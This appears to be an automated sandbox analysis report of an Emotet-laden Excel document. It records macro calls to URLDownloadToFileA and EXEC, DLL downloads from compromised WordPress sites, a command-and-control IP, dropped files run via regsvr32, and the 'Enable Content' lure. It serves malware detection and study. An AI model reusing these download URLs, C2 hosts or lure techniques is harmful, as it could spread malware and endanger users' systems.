Source: regsvr32.exe, 00000007.00000002.1219152991.000000000040E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enP
Source: regsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enR
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000004.00000002.1219527866.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000004.00000002.1219237595.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219537564.0000000002CC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229/
Source: regsvr32.exe, 00000007.00000002.1219152991.000000000040E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229/5v
Source: regsvr32.exe, 00000007.00000002.1219152991.000000000040E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229/=v
Source: regsvr32.exe, 0000000B.00000002.1219537564.0000000002CC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229/KP
Source: regsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229/l
Source: regsvr32.exe, 00000004.00000003.988822373.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219237595.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219152991.000000000040E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219537564.0000000002CC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229:8080/
Source: regsvr32.exe, 00000004.00000003.988822373.0000000000361000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219237595.0000000000361000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229:8080/.t
Source: regsvr32.exe, 0000000B.00000002.1219557119.0000000002CE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229:8080/1o
Source: regsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229:8080/L
Source: regsvr32.exe, 00000009.00000002.1219187655.00000000004B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://165.22.73.229:8080/h
Source: regsvr32.exe, 00000004.00000002.1219527866.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll Jump to behavior
Source: unknown DNS traffic detected: queries for: learnviaonline.com
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180017C8C InternetReadFile, 4_2_0000000180017C8C
Source: global traffic HTTP traffic detected: GET /wp-admin/qGb/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: learnviaonline.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/REvup/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kolejleri.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /classes/05SkiiW9y4DDGvb6/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: stainedglassexpress.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/D4TRnDubF/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: milanstaffing.comConnection: Keep-Alive

E-Banking Fraud
barindex
Yara detected Emotet
Source: Yara match File source: 10.2.regsvr32.exe.2c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.regsvr32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.regsvr32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.regsvr32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.regsvr32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.regsvr32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.3e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.regsvr32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.regsvr32.exe.2c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.1219777301.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1218923490.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.935437838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.950850615.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.935123835.00000000003E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.944087304.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1219645231.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1218912030.0000000000150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1218942103.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.951348566.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.926422500.0000000000300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.943168453.00000000002D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1218930467.0000000000220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1219771205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1219706572.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
Source: Screenshot number: 4 Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
Found malicious Excel 4.0 Macro
Source: DETAILS 25922194612.xls Macro extractor: Sheet: PKEKPPGEKKPGE contains: URLDownloadToFileA
Source: DETAILS 25922194612.xls Macro extractor: Sheet: PKEKPPGEKKPGE contains: URLDownloadToFileA
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr3.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr2.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr4.ocx Jump to dropped file
Found Excel 4.0 Macro with suspicious formulas
Source: DETAILS 25922194612.xls Initial sample: EXEC
Source: DETAILS 25922194612.xls Initial sample: EXEC
Creates files inside the system directory
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\system32\KuSAkvGE\ Jump to behavior
Detected potential crypto function
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D212B0 3_2_000007FEF9D212B0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D25E01 3_2_000007FEF9D25E01
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D25CAD 3_2_000007FEF9D25CAD
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D26850 3_2_000007FEF9D26850
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D2443C 3_2_000007FEF9D2443C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D253FB 3_2_000007FEF9D253FB
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D24A70 3_2_000007FEF9D24A70
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_002B0000 3_2_002B0000
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180026410 3_2_0000000180026410
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180025C30 3_2_0000000180025C30
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180001D58 3_2_0000000180001D58
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180011E5C 3_2_0000000180011E5C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002C6C8 3_2_000000018002C6C8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002C2C8 3_2_000000018002C2C8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180026F14 3_2_0000000180026F14
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180016320 3_2_0000000180016320
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180001378 3_2_0000000180001378
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180018FE8 3_2_0000000180018FE8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001ABE8 3_2_000000018001ABE8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800243F4 3_2_00000001800243F4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800083F8 3_2_00000001800083F8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800247FC 3_2_00000001800247FC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001DBFC 3_2_000000018001DBFC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001100C 3_2_000000018001100C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180027C28 3_2_0000000180027C28
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002143C 3_2_000000018002143C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001303C 3_2_000000018001303C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002A840 3_2_000000018002A840
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180003840 3_2_0000000180003840
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000B444 3_2_000000018000B444
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000F048 3_2_000000018000F048
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002AC4C 3_2_000000018002AC4C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180010050 3_2_0000000180010050
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180003050 3_2_0000000180003050
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000445C 3_2_000000018000445C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000C85C 3_2_000000018000C85C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180003460 3_2_0000000180003460
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180029C6C 3_2_0000000180029C6C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001586C 3_2_000000018001586C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000406C 3_2_000000018000406C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000E06C 3_2_000000018000E06C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000BC70 3_2_000000018000BC70
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001447C 3_2_000000018001447C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180026C80 3_2_0000000180026C80
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180010C84 3_2_0000000180010C84
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180016088 3_2_0000000180016088
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180002888 3_2_0000000180002888
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180017C8C 3_2_0000000180017C8C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000FC8C 3_2_000000018000FC8C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002D098 3_2_000000018002D098
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800154B8 3_2_00000001800154B8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180011CCC 3_2_0000000180011CCC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800064D0 3_2_00000001800064D0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800180D4 3_2_00000001800180D4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800054D8 3_2_00000001800054D8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002CCE0 3_2_000000018002CCE0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800254E4 3_2_00000001800254E4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800184E8 3_2_00000001800184E8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800010E8 3_2_00000001800010E8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000E8F0 3_2_000000018000E8F0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002A0F8 3_2_000000018002A0F8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180019900 3_2_0000000180019900
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180011904 3_2_0000000180011904
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001F908 3_2_000000018001F908
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002490C 3_2_000000018002490C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001890C 3_2_000000018001890C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001D510 3_2_000000018001D510
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180003D18 3_2_0000000180003D18
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002191C 3_2_000000018002191C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001D128 3_2_000000018001D128
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000D12C 3_2_000000018000D12C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180014930 3_2_0000000180014930
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180008534 3_2_0000000180008534
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001CD44 3_2_000000018001CD44
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000B948 3_2_000000018000B948
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000796C 3_2_000000018000796C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180010590 3_2_0000000180010590
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180028D94 3_2_0000000180028D94
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800091A8 3_2_00000001800091A8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800171B8 3_2_00000001800171B8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180018DBC 3_2_0000000180018DBC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800141C8 3_2_00000001800141C8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002B1D4 3_2_000000018002B1D4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180023DDC 3_2_0000000180023DDC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800165E4 3_2_00000001800165E4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180029DF0 3_2_0000000180029DF0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180015DF4 3_2_0000000180015DF4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800011F4 3_2_00000001800011F4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000FE08 3_2_000000018000FE08
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180027E14 3_2_0000000180027E14
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000B618 3_2_000000018000B618
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180023220 3_2_0000000180023220
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180020A34 3_2_0000000180020A34
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180007634 3_2_0000000180007634
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180022E38 3_2_0000000180022E38
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000E638 3_2_000000018000E638
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180010250 3_2_0000000180010250
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180026A64 3_2_0000000180026A64
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180004264 3_2_0000000180004264
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180013674 3_2_0000000180013674
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000F678 3_2_000000018000F678
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000E278 3_2_000000018000E278
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180005E7C 3_2_0000000180005E7C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180025E88 3_2_0000000180025E88
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002868C 3_2_000000018002868C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180014E98 3_2_0000000180014E98
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180014AA4 3_2_0000000180014AA4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800126A8 3_2_00000001800126A8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800036A8 3_2_00000001800036A8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002A6BC 3_2_000000018002A6BC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001CABC 3_2_000000018001CABC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000EAC0 3_2_000000018000EAC0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001B6D4 3_2_000000018001B6D4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000F2DC 3_2_000000018000F2DC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800202E0 3_2_00000001800202E0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800226E0 3_2_00000001800226E0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180019AF0 3_2_0000000180019AF0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000BEF0 3_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180012EF8 3_2_0000000180012EF8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180029710 3_2_0000000180029710
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180017710 3_2_0000000180017710
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000C740 3_2_000000018000C740
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180020F44 3_2_0000000180020F44
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180023B48 3_2_0000000180023B48
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180023748 3_2_0000000180023748
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180021754 3_2_0000000180021754
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180022358 3_2_0000000180022358
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180029F5C 3_2_0000000180029F5C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002B368 3_2_000000018002B368
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001BF70 3_2_000000018001BF70
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180025374 3_2_0000000180025374
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180007F74 3_2_0000000180007F74
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180021F7C 3_2_0000000180021F7C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180019788 3_2_0000000180019788
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180001B8C 3_2_0000000180001B8C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180028394 3_2_0000000180028394
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180013B94 3_2_0000000180013B94
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001479C 3_2_000000018001479C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000E7A0 3_2_000000018000E7A0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800087A4 3_2_00000001800087A4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180017BA8 3_2_0000000180017BA8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000EBAC 3_2_000000018000EBAC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001B3B8 3_2_000000018001B3B8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180012BB8 3_2_0000000180012BB8
